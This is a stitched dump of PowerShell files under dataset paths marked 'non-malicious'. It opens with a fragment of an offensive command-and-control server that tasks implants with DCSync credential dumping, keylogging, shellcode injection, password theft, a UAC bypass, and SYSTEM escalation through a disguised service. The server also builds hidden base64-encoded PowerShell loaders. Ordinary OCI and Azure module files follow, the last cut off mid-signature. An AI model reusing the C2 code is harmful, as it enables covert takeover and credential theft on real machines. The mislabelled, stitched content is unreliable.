($pscommand.ToLower().StartsWith('invoke-sharefinder')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-netshare')) { CheckModuleLoaded "PowerView.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-dcsync')) { CheckModuleLoaded "Invoke-DCSync.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-keystrokes')) { CheckModuleLoaded "Get-Keystrokes.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('arpscan')) { CheckModuleLoaded "Invoke-Arpscan.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('portscan')) { CheckModuleLoaded "PortScanner.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('invoke-portscan')) { CheckModuleLoaded "Invoke-Portscan.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('inject-shellcode')) { CheckModuleLoaded "Inject-Shellcode.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-mshotfixes')) { CheckModuleLoaded "Get-MSHotFixes.ps1" $psrandomuri } if ($pscommand.ToLower().StartsWith('get-gpppassword')) { CheckModuleLoaded "Get-GPPPassword.ps1" $psrandomuri } if ($pscommand.tolower().startswith('invoke-wmicommand')) { CheckModuleLoaded "Invoke-WMICommand.ps1" $psrandomuri } if ($pscommand.tolower().startswith('invoke-hostenum')) { CheckModuleLoaded "HostEnum.ps1" $psrandomuri } if ($pscommand.tolower().startswith('find-allvulns')) { CheckModuleLoaded "sherlock.ps1" $psrandomuri } if ($pscommand.tolower().startswith('dump-ntds')) { CheckModuleLoaded "dump-ntds.ps1" $psrandomuri } if ($pscommand.tolower().startswith('brute-ad')) { CheckModuleLoaded "brute-ad.ps1" $psrandomuri } if ($pscommand.tolower().startswith('brute-locadmin')) { CheckModuleLoaded "brute-locadmin.ps1" $psrandomuri } if ($pscommand.tolower().startswith('get-passpol')) { CheckModuleLoaded "get-passpol.ps1" $psrandomuri } if ($pscommand.tolower().startswith('get-locadm')) { CheckModuleLoaded "get-locadm.ps1" $psrandomuri } if ($pscommand.tolower().startswith('invoke-runas')) { CheckModuleLoaded "invoke-runas.ps1" $psrandomuri } if ($pscommand.tolower().startswith('invoke-shellcode')) { CheckModuleLoaded "invoke-shellcode.ps1" $psrandomuri } if ($pscommand.tolower().startswith('get-pass-notexp')) { CheckModuleLoaded "get-pass-notexp.ps1" $psrandomuri } if ($pscommand.tolower().startswith('invoke-winrmsession')) { CheckModuleLoaded "Invoke-WinRMSession.ps1" $psrandomuri } if ($pscommand.tolower().startswith('get-computerinfo')) { CheckModuleLoaded "Get-ComputerInfo.ps1" $psrandomuri } if ($pscommand.tolower().startswith('get-userinfo')) { CheckModuleLoaded "Get-UserInfo.ps1" $psrandomuri } if ($pscommand.tolower().startswith('sharpsocks')) { CheckModuleLoaded "sharpsocks.ps1" $psrandomuri $Key = Create-AesKey $Channel = Get-RandomURI -Length 25 $IP = Read-Host "Local IP Address to bind to, e.g. http://172.16.0.1:80" start-process "powershell" -ArgumentList "-exec bypass -noexit -c import-module $($PoshPath)\Modules\SharpSocks.ps1; SharpSocks -Server -Channel $Channel -Key $Key -Uri $IP" -WindowStyle Minimized $pscommand = "$($pscommand) -Client -Channel $Channel -Key $Key -URLs $SocksURLs" } if ($pscommand.tolower().startswith('invoke-enum')) { CheckModuleLoaded "Get-ComputerInfo.ps1" $psrandomuri CheckModuleLoaded "Get-MSHotFixes.ps1" $psrandomuri CheckModuleLoaded "PowerView.ps1" $psrandomuri CheckModuleLoaded "Get-RecentFiles.ps1" $psrandomuri CheckModuleLoaded "POwerup.ps1" $psrandomuri CheckModuleLoaded "Get-FirewallRules.ps1" $psrandomuri CheckModuleLoaded "Get-GPPPassword.ps1" $psrandomuri CheckModuleLoaded "Get-WLANPass.ps1" $psrandomuri $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Netstat -anp tcp; Netstat -anp udp; Net share; Ipconfig; Net view; Net users; Net localgroup administrators; Net accounts; Net accounts dom;" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-Proxy; Invoke-allchecks; Get-MShotfixes" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-Firewallrulesall | out-string -width 200" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-Screenshot" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-GPPPassword" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-Content 'C:\ProgramData\McAfee\Common Framework\SiteList.xml'" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-WmiObject -Class Win32_Product" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-ItemProperty -Path `"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`" -Name CachedLogonsCount" } | Out-Null Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "Get-ItemProperty -Path `"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters`"" } | Out-Null $pscommand = "Get-RecentFiles; Get-WLANPass" } if ($pscommand.ToLower().StartsWith('invoke-runaspayload')) { CheckModuleLoaded "NamedPipe.ps1" $psrandomuri CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri $pscommand = $pscommand -replace 'invoke-runaspayload', '' $psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();" $bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase) $encodedCommand= [Convert]::ToBase64String($bytes) $pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`"" } if ($pscommand.ToLower().StartsWith('invoke-runasproxypayload')) { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ $proxypayload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = '$proxypayload = "'+$proxypayload+'"' } | Out-Null CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri $pscommand = $pscommand -replace 'invoke-runasproxypayload', '' $psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();" $bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase) $encodedCommand= [Convert]::ToBase64String($bytes) $pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`"" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('invoke-runasdaisypayload')) { $name = Read-Host "Name" if (Test-Path "$FolderPath\payloads\$($name).bat"){ $daisypayload = Get-Content -Path "$FolderPath\payloads\$($name).bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = '$daisypayload = "'+$daisypayload+'"' } | Out-Null CheckModuleLoaded "NamedPipeDaisy.ps1" $psrandomuri CheckModuleLoaded "Invoke-RunAs.ps1" $psrandomuri $pscommand = $pscommand -replace 'invoke-runasdaisypayload', '' $psCommandBase = "add-Type -assembly System.Core; `$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();" $bytes = [System.Text.Encoding]::Unicode.GetBytes($psCommandBase) $encodedCommand= [Convert]::ToBase64String($bytes) $pscommand = "invoke-runas $($pscommand) -command C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -Args `" -e $encodedCommand`"" } else { write-host "Need to run Invoke-DaisyChain first" $pscommand = $null } } if ($pscommand.ToLower().StartsWith('createmacropayload')) { $pscommand|Invoke-Expression $pscommand = $null } if ($pscommand.ToLower().StartsWith('invoke-daisychain')) { $output = Invoke-Expression $pscommand $pscommand = $output } if ($pscommand.ToLower().StartsWith('createproxypayload')) { $pscommand|Invoke-Expression $pscommand = $null } if (($pscommand.ToLower().StartsWith('upload-file')) -or ($pscommand.ToLower().StartsWith('uploadfile'))) { $pscommand = $pscommand -replace "uploadfile","upload-file" $output = Invoke-Expression $pscommand $pscommand = $output } if ($pscommand.ToLower().StartsWith('createpayload')) { $pscommand|Invoke-Expression $pscommand = $null } if ($pscommand -eq 'cred-popper') { CheckModuleLoaded "Cred-Popper.ps1" $psrandomuri } if (($pscommand.ToLower().StartsWith('sleep')) -or ($pscommand.ToLower().StartsWith('beacon')) -or ($pscommand.ToLower().StartsWith('set-beacon')) -or ($pscommand.ToLower().StartsWith('setbeacon'))) { $pscommand = $pscommand -replace 'set-beacon ', '' $pscommand = $pscommand -replace 'setbeacon ', '' $pscommand = $pscommand -replace 'sleep ', '' $pscommand = $pscommand -replace 'beacon ', '' $sleeptime = $pscommand if ($sleeptime.ToLower().Contains('m')) { $sleeptime = $sleeptime -replace 'm', '' [int]$newsleep = $sleeptime [int]$newsleep = $newsleep * 60 } elseif ($sleeptime.ToLower().Contains('h')) { $sleeptime = $sleeptime -replace 'h', '' [int]$newsleep1 = $sleeptime [int]$newsleep2 = $newsleep1 * 60 [int]$newsleep = $newsleep2 * 60 } elseif ($sleeptime.ToLower().Contains('s')) { $newsleep = $sleeptime -replace 's', '' } else { $newsleep = $sleeptime } $pscommand = '$sleeptime = '+$newsleep $query = "UPDATE Implants SET Sleep=@Sleep WHERE RandomURI=@RandomURI" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ Sleep = $newsleep RandomURI = $psrandomuri } | Out-Null } if ($pscommand -eq 'invoke-ms16-032') { CheckModuleLoaded "NamedPipe.ps1" $psrandomuri $pscommand = "LoadModule invoke-ms16-032.ps1" } if ($pscommand -eq 'invoke-ms16-032-proxypayload') { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "proxypayload.ps1" $psrandomuri CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri $pscommand = "LoadModule invoke-ms16-032-proxy.ps1" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand -eq 'invoke-uacbypassproxy') { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ CheckModuleLoaded "ProxyPayload.ps1" $psrandomuri CheckModuleLoaded "NamedPipeProxy.ps1" $psrandomuri CheckModuleLoaded "Invoke-EventVwrBypass.ps1" $psrandomuri $pspayloadnamedpipe = "`$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();" $bytes = [System.Text.Encoding]::Unicode.GetBytes($pspayloadnamedpipe) $payloadraw = 'powershell -exec bypass -Noninteractive -windowstyle hidden -e '+[Convert]::ToBase64String($bytes) $pscommand = "Invoke-EventVwrBypass -Command `"$payloadraw`"" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand -eq 'invoke-uacbypass') { $payload = Get-Content -Path "$FolderPath\payloads\payload.bat" CheckModuleLoaded "Invoke-EventVwrBypass.ps1" $psrandomuri CheckModuleLoaded "NamedPipe.ps1" $psrandomuri $pspayloadnamedpipe = "`$pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); `$pi.Connect(); `$pr = new-object System.IO.StreamReader(`$pi); iex `$pr.ReadLine();" $bytes = [System.Text.Encoding]::Unicode.GetBytes($pspayloadnamedpipe) $payloadraw = 'powershell -exec bypass -Noninteractive -windowstyle hidden -e '+[Convert]::ToBase64String($bytes) $pscommand = "Invoke-EventVwrBypass -Command `"$payloadraw`"" } if ($pscommand -eq 'Get-System') { $payload = Get-Content -Path "$FolderPath\payloads\payload.bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto" } | Out-Null $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe start CPUpdater" } | Out-Null $pscommand = "sc.exe delete CPUpdater" } if ($pscommand -eq 'Get-System-WithProxy') { if (Test-Path "$FolderPath\payloads\proxypayload.bat"){ $payload = Get-Content -Path "$FolderPath\payloads\proxypayload.bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto" } | Out-Null $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe start CPUpdater" } | Out-Null $pscommand = "sc.exe delete CPUpdater" } else { write-host "Need to run CreateProxyPayload first" $pscommand = $null } } if ($pscommand -eq 'Get-System-WithDaisy') { $name = Read-Host "Name" if (Test-Path "$FolderPath\payloads\$($name).bat"){ $payload = Get-Content -Path "$FolderPath\payloads\$($name).bat" $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe create CPUpdater binpath= 'cmd /c "+$payload+"' Displayname= CheckpointServiceUpdater start= auto" } | Out-Null $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $psrandomuri Command = "sc.exe start CPUpdater" } | Out-Null $pscommand = "sc.exe delete CPUpdater" } else { write-host "Need to run Invoke-DaisyChain first" $pscommand = $null } } if ($pscommand -eq 'Hide-Implant') { $pscommand = "Hide" } if ($pscommand -eq 'Unhide-Implant' ) { Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='Yes' WHERE RandomURI='$psrandomuri'" | Out-Null } $pscommand } while($true) { $global:command = Read-Host -Prompt $global:cmdlineinput if ($global:command) { $query = "INSERT INTO History (Command) VALUES (@Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ Command = $global:command } | Out-Null if ($global:implantid -eq "ALL") { if ($global:command -eq 'back' -or $global:command -eq 'exit') { startup } elseif ($global:command -eq 'help') { print-help } elseif ($global:command.ToLower().StartsWith('help')) { $global:command = $global:command -replace 'help ','' print-help $global:command } elseif ($global:command -eq '?') { print-help } else { $dbresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE Alive='Yes'" -As SingleValue foreach ($implanturisingular in $dbresults) { $global:randomuri = $implanturisingular $outputcmd = runcommand $global:command $global:randomuri if (($outputcmd -eq 'exit' ) -or ($outputcmd -eq 'hide' )) { Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$implanturisingular'"|Out-Null } $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $implanturisingular Command = $outputcmd } | Out-Null } } } elseif ($global:implantid.contains(",")){ if ($global:command -eq 'back' -or $global:command -eq 'exit') { startup } elseif ($global:command -eq 'help') { print-help } elseif ($global:command.ToLower().StartsWith('help')) { $global:command = $global:command -replace 'help ','' print-help $global:command } elseif ($global:command -eq '?') { print-help } else { $global:implantid.split(",")| foreach { $global:randomuri = Invoke-SqliteQuery -DataSource $Database -Query "SELECT RandomURI FROM Implants WHERE ImplantID='$_'" -as SingleValue $outputcmd = runcommand $global:command $global:randomuri if (($global:command -eq 'exit' ) -or ($outputcmd -eq 'hide' )) { Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$global:randomuri'"|Out-Null } $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $global:randomuri Command = $outputcmd } | Out-Null } } } else { if ($global:command -eq 'back' -or $global:command -eq 'exit') { startup } elseif ($global:command -eq 'help') { print-help } elseif ($global:command.ToLower().StartsWith('help')) { $global:command = $global:command -replace 'help ','' print-help $global:command } elseif ($global:command -eq '?') { print-help } else { $outputcmd = runcommand $global:command $global:randomuri if ($outputcmd -eq 'hide') { Invoke-SqliteQuery -DataSource $Database -Query "UPDATE Implants SET Alive='No' WHERE RandomURI='$global:randomuri'"|Out-Null $outputcmd = $null } if ($outputcmd) { $query = "INSERT INTO NewTasks (RandomURI, Command) VALUES (@RandomURI, @Command)" Invoke-SqliteQuery -DataSource $Database -Query $query -SqlParameters @{ RandomURI = $global:randomuri Command = $outputcmd } | Out-Null } } } } } }
combined_dataset/train/non-malicious/sample_14_18.ps1
sample_14_18.ps1
# # Module manifest for module 'OCI.PSModules.Resourcesearch' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Resourcesearch.dll' # Version number of this module. ModuleVersion = '81.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '7fdc6e7d-ec41-48a8-9c23-5e5149a3e83b' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Resourcesearch Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Resourcesearch.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIResourcesearchResourceType', 'Get-OCIResourcesearchResourceTypesList', 'Invoke-OCIResourcesearchSearchResources' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Resourcesearch' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_65_45.ps1
sample_65_45.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Create an in-memory object for Databricks. .Description Create an in-memory object for Databricks. .Outputs Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks .Link https://learn.microsoft.com/powershell/module/Az.MachineLearningServices/new-AzMLWorkspaceDatabricksObject #> function New-AzMLWorkspaceDatabricksObject { [OutputType('Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks')] [CmdletBinding(PositionalBinding=$false)] Param( [Parameter(HelpMessage="The description of the Machine Learning compute.")] [string] $Description, [Parameter(HelpMessage="Opt-out of local authentication and ensure customers can use only MSI and AAD exclusively for authentication.")] [bool] $DisableLocalAuth, [Parameter(HelpMessage="ARM resource id of the underlying compute.")] [string] $ResourceId, [Parameter(HelpMessage="Databricks access token.")] [string] $AccessToken, [Parameter(HelpMessage="Workspace Url.")] [string] $WorkspaceUrl ) process { $Object = [Microsoft.Azure.PowerShell.Cmdlets.MachineLearningServices.Models.Api20240401.Databricks]::New() $Object.Type = 'Databricks' if ($PSBoundParameters.ContainsKey('Description')) { $Object.Description = $Description } if ($PSBoundParameters.ContainsKey('DisableLocalAuth')) { $Object.DisableLocalAuth = $DisableLocalAuth } if ($PSBoundParameters.ContainsKey('ResourceId')) { $Object.ResourceId = $ResourceId } if ($PSBoundParameters.ContainsKey('Type')) { } if ($PSBoundParameters.ContainsKey('AccessToken')) { $Object.AccessToken = $AccessToken } if ($PSBoundParameters.ContainsKey('WorkspaceUrl')) { $Object.WorkspaceUrl = $WorkspaceUrl } return $Object } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBuUr/qhZxypy/j # NdRpR7AevvrSWsm8USChGKEUNd9R/6CCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # 